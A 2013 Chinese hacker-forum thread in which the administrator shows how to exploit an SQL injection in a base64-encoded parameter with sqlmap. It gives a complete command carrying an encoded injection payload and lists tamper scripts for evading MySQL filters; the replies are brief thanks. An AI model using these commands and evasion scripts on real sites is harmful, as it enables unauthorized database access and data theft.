搜索
查看: 725|回复: 5

SQlMap Tamper注入Base64编码注入点

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-11-8 20:38:24 来自手机 | 显示全部楼层 |阅读模式
WVS扫某站就出来一个sql Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
sqlmap的tamper里有个base64encode.py
使用如下
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
首先确定目标数据库版本,然后选择相应的脚本。
-v 3 --batch --tamper "space2hash.py"
还有其他一些插件:
encodes编码 ——charencode.py
base64编码 —— base64encode.py
替换空格和关键字 —— halfversionedmorekeywords.py
854955425 该用户已被删除
发表于 2013-11-8 20:43:13 | 显示全部楼层
好好 学习了 确实不错
854955425 该用户已被删除
发表于 2013-11-8 20:53:52 | 显示全部楼层
有道理。。。
Anon_GST 该用户已被删除
发表于 2013-11-8 23:07:51 | 显示全部楼层
SQLMAP有WIN板嗎?

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
 楼主| 发表于 2013-11-10 04:49:10 | 显示全部楼层

过段时间可能会取消签到功能了
Anon_GST 该用户已被删除
发表于 2013-11-10 12:35:12 | 显示全部楼层

可以貼給我嗎?
我好想要
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表